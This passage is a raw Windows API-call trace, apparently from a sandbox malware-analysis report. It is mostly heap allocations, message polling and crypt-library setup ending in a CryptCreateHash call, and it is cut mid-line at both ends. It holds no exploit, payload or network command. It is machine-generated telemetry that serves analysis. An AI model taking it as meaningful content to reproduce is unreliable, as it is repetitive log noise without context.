returned 1 [0249.839] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0249.839] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0249.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0249.839] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0249.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0249.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51550 [0249.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0249.839] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0249.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0249.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0249.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0249.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.839] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0249.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0249.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0249.839] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0249.840] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0249.840] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0249.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0249.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0249.840] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0249.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0249.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0249.841] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0249.841] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0249.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0249.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0249.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0249.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0249.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0249.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0249.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0249.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0249.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0249.842] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0249.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0249.843] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0249.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0249.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0249.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0249.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0249.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0249.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0249.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0249.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0249.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0249.843] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0249.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0249.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0249.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0249.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0249.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0249.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0249.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0249.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0249.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0249.843] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0249.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0249.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0249.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0249.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0249.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0249.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0249.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0249.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0249.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0249.844] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0249.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0249.844] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0249.844] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0249.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0249.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ae8 [0249.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0249.844] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0249.844] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0249.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0249.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0249.845] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0249.845] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0249.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0249.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0249.845] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0249.845] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0249.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0249.845] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0249.845] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0249.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0249.845] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0249.845] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0249.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0249.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0249.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0249.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0249.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0249.846] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0249.846] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0249.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0249.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0249.846] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0249.846] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0249.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0249.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0249.846] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0249.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0249.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0249.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0249.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0249.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0249.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0249.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51718, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0249.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0249.847] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0249.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0249.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0249.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0249.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0249.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0249.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0249.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0249.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0249.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0249.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0249.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0249.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0249.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0249.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0249.848] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0249.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0249.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0249.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0249.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0249.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0249.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0249.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0249.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0249.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0249.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0249.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0249.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0249.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0249.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0249.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0249.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0249.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0249.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0249.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0249.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0249.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0249.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0249.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0249.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0249.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0249.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0249.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0249.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0249.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0249.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0249.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0249.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0249.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0249.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0249.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0249.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0249.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0249.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0249.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0249.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0249.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0249.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0249.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0249.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0249.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0249.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0249.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0249.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0249.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0249.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0249.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0249.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0249.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0249.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0249.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0249.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0249.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0249.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0249.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0249.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0249.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0249.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0249.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0249.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0249.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0249.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0249.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0249.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0249.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0249.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0249.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0249.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0249.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0249.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0249.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0249.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0249.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0249.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0249.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0249.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0249.856] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0249.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0249.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0249.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0249.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0249.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0249.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0249.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0249.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: 